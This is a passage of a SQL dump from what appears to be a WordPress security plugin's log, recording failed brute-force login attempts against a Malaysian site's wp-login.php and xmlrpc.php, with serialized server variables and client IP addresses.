Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"32828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE2Xo75s89pqgR69SLL9wAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749151.0188\";s:12:\"REQUEST_TIME\";s:10:\"1568749151\";}}','notice','2019-09-17 19:39:12','2019-09-17 19:39:11',17740744,19232776,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(24710,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"33190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE2YSqbKGlf1IVly7N1DQAAAU8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749154.1276\";s:12:\"REQUEST_TIME\";s:10:\"1568749154\";}}','notice','2019-09-17 19:39:15','2019-09-17 19:39:14',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'74.115.209.253'),(24711,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"167.99.47.59\";s:11:\"REMOTE_PORT\";s:5:\"52561\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE3oI75s89pqgR69SLMgQAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749472.2781\";s:12:\"REQUEST_TIME\";s:10:\"1568749472\";}}','notice','2019-09-17 19:44:33','2019-09-17 19:44:32',17741936,19232440,'https://bintara.com.my/wp-login.php',1,0,'167.99.47.59'),(24712,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"167.99.47.59\";s:11:\"REMOTE_PORT\";s:5:\"53061\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE3o475s89pqgR69SLMggAAAYs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568749475.184\";s:12:\"REQUEST_TIME\";s:10:\"1568749475\";}}','notice','2019-09-17 19:44:36','2019-09-17 19:44:35',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.47.59'),(24713,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"49908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE41475s89pqgR69SLNCgAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749783.2635\";s:12:\"REQUEST_TIME\";s:10:\"1568749783\";}}','notice','2019-09-17 19:49:44','2019-09-17 19:49:43',17739264,19231264,'https://bintara.com.my/wp-login.php',1,0,'97.74.6.168'),(24714,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"50714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE42SqbKGlf1IVly7N1pQAAAVY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568749785.9831\";s:12:\"REQUEST_TIME\";s:10:\"1568749785\";}}','notice','2019-09-17 19:49:47','2019-09-17 19:49:46',18256416,19556592,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.6.168'),(24715,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"58226\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE5yG4SfF9g@8lNlxwf7QAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568750024.8382\";s:12:\"REQUEST_TIME\";s:10:\"1568750024\";}}','notice','2019-09-17 19:53:46','2019-09-17 19:53:45',17740448,19230512,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24716,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"58712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE5zI75s89pqgR69SLNcQAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568750028.3013\";s:12:\"REQUEST_TIME\";s:10:\"1568750028\";}}','notice','2019-09-17 19:53:49','2019-09-17 19:53:48',18258376,19555792,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24717,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.67.0.188\";s:11:\"REMOTE_PORT\";s:5:\"36824\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE780QGijxhVPhG1M376AAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568750579.5013\";s:12:\"REQUEST_TIME\";s:10:\"1568750579\";}}','notice','2019-09-17 20:03:00','2019-09-17 20:02:59',17739208,19229720,'https://bintara.com.my/wp-login.php',1,0,'185.67.0.188'),(24718,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 